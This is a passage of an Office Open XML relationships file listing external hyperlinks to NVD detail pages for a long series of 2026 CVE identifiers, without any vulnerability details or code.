Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76557" TargetMode="External" Id="rId1481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76558" TargetMode="External" Id="rId1482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76559" TargetMode="External" Id="rId1483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76646" TargetMode="External" Id="rId1484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77702" TargetMode="External" Id="rId1485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78472" TargetMode="External" Id="rId1486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78474" TargetMode="External" Id="rId1487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79298" TargetMode="External" Id="rId1488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79993" TargetMode="External" Id="rId1489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81192" TargetMode="External" Id="rId1490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82124" TargetMode="External" Id="rId1491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82125" TargetMode="External" Id="rId1492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82126" TargetMode="External" Id="rId1493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82310" TargetMode="External" Id="rId1494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82311" TargetMode="External" Id="rId1495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84088" TargetMode="External" Id="rId1496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84439" TargetMode="External" Id="rId1497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84829" TargetMode="External" Id="rId1498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84905" TargetMode="External" Id="rId1499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84907" TargetMode="External" Id="rId1500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85131" TargetMode="External" Id="rId1501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85349" TargetMode="External" Id="rId1502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85530" TargetMode="External" Id="rId1503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85569" TargetMode="External" Id="rId1504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85572" TargetMode="External" Id="rId1505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85641" TargetMode="External" Id="rId1506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85789" TargetMode="External" Id="rId1507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86444" TargetMode="External" Id="rId1508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86445" TargetMode="External" Id="rId1509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86447" TargetMode="External" Id="rId1510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86448" TargetMode="External" Id="rId1511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86449" TargetMode="External" Id="rId1512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86462" TargetMode="External" Id="rId1513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86465" TargetMode="External" Id="rId1514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86466" TargetMode="External" Id="rId1515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86784" TargetMode="External" Id="rId1516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86792" TargetMode="External" Id="rId1517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86823" TargetMode="External" Id="rId1518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87828" TargetMode="External" Id="rId1519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87854" TargetMode="External" Id="rId1520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87860" TargetMode="External" Id="rId1521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87896" TargetMode="External" Id="rId1522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87907" TargetMode="External" Id="rId1523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87959" TargetMode="External" Id="rId1524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88592" TargetMode="External" Id="rId1525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88593" TargetMode="External" Id="rId1526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88910" TargetMode="External" Id="rId1527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89327" TargetMode="External" Id="rId1528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89328" TargetMode="External" Id="rId1529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89776" TargetMode="External" Id="rId1530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89780" TargetMode="External" Id="rId1531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89784" TargetMode="External" Id="rId1532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89785" TargetMode="External" Id="rId1533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89787" TargetMode="External" Id="rId1534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89790" TargetMode="External" Id="rId1535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89794" TargetMode="External" Id="rId1536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89796" TargetMode="External" Id="rId1537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89797" TargetMode="External" Id="rId1538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89798" TargetMode="External" Id="rId1539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89800" TargetMode="External" Id="rId1540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89802" TargetMode="External" Id="rId1541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89807" TargetMode="External" Id="rId1542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89809" TargetMode="External" Id="rId1543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89812" TargetMode="External" Id="rId1544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89813" TargetMode="External" Id="rId1545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89816" TargetMode="External" Id="rId1546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89817" TargetMode="External" Id="rId1547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89820" TargetMode="External" Id="rId1548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89821" TargetMode="External" Id="rId1549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89822" TargetMode="External" Id="rId1550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89824" TargetMode="External" Id="rId1551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89827" TargetMode="External" Id="rId1552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89828" TargetMode="External" Id="rId1553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89830" TargetMode="External" Id="rId1554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89831" TargetMode="External" Id="rId1555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89833" TargetMode="External" Id="rId1556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89834" TargetMode="External" Id="rId1557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89835" TargetMode="External" Id="rId1558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89837" TargetMode="External" Id="rId1559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89839" TargetMode="External" Id="rId1560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89842" TargetMode="External" Id="rId1561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89843" TargetMode="External" Id="rId1562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89845" TargetMode="External" Id="rId1563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89850" TargetMode="External" Id="rId1564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89851" TargetMode="External" Id="rId1565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89852" TargetMode="External" Id="rId1566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89853" TargetMode="External" Id="rId1567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89855" TargetMode="External" Id="rId1568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89858" TargetMode="External" Id="rId1569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89859" TargetMode="External" Id="rId1570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89862" TargetMode="External" Id="rId1571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89864" TargetMode="External" Id="rId1572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89865" TargetMode="External" Id="rId1573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89866" TargetMode="External" Id="rId1574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89867" TargetMode="External" Id="rId1575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89868" TargetMode="External" Id="rId1576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89869" TargetMode="External" Id="rId1577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89871" TargetMode="External" Id="rId1578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89872" TargetMode="External" Id="rId1579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89874" TargetMode="External" Id="rId1580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89876" TargetMode="External" Id="rId1581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89878" TargetMode="External" Id="rId1582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89879" TargetMode="External" Id="rId1583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89881" TargetMode="External" Id="rId1584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89884" TargetMode="External" Id="rId1585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89886" TargetMode="External" Id="rId1586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89889" TargetMode="External" Id="rId1587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89891" TargetMode="External" Id="rId1588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89892" TargetMode="External" Id="rId1589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89895" TargetMode="External" Id="rId1590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89896" TargetMode="External" Id="rId1591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89900" TargetMode="External" Id="rId1592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89901" TargetMode="External" Id="rId1593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89905" TargetMode="External" Id="rId1594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89909" TargetMode="External" Id="rId1595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89917" TargetMode="External" Id="rId1596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89921" TargetMode="External" Id="rId1597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89923" TargetMode="External" Id="rId1598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89924" TargetMode="External" Id="rId1599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89925" TargetMode="External" Id="rId1600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89926" TargetMode="External" Id="rId1601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89931" TargetMode="External" Id="rId1602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89933" TargetMode="External" Id="rId1603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89934" TargetMode="External" Id="rId1604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89935" TargetMode="External" Id="rId1605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89936" TargetMode="External" Id="rId1606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89937" TargetMode="External" Id="rId1607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89939" TargetMode="External" Id="rId1608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89944" TargetMode="External" Id="rId1609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89945" TargetMode="External" Id="rId1610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89946" TargetMode="External" Id="rId1611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89948" TargetMode="External" Id="rId1612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89949" TargetMode="External" Id="rId1613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89950" TargetMode="External" Id="rId1614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89952" TargetMode="External" Id="rId1615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89953" TargetMode="External" Id="rId1616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89955" TargetMode="External" Id="rId1617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89956" TargetMode="External" Id="rId1618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89958" TargetMode="External" Id="rId1619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89962" TargetMode="External" Id="rId1620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89963" TargetMode="External" Id="rId1621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89964" TargetMode="External" Id="rId1622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89966" TargetMode="External" Id="rId1623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89975" TargetMode="External" Id="rId1624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89976" TargetMode="External" Id="rId1625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89977" TargetMode="External" Id="rId1626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89978" TargetMode="External" Id="rId1627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89981" TargetMode="External" Id="rId1628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89982" TargetMode="External" Id="rId1629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89983" TargetMode="External" Id="rId1630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89984" TargetMode="External" Id="rId1631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89987" TargetMode="External" Id="rId1632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89989" TargetMode="External" Id="rId1633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89991" TargetMode="External" Id="rId1634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89993" TargetMode="External" Id="rId1635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89996" TargetMode="External" Id="rId1636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90004" TargetMode="External" Id="rId1637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90005" TargetMode="External" Id="rId1638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90006" TargetMode="External" Id="rId1639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90015" TargetMode="External" Id="rId1640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90019" TargetMode="External" Id="rId1641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90020" TargetMode="External" Id="rId1642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90021" TargetMode="External" Id="rId1643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90023" TargetMode="External" Id="rId1644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90024" TargetMode="External" Id="rId1645" /><Relationship 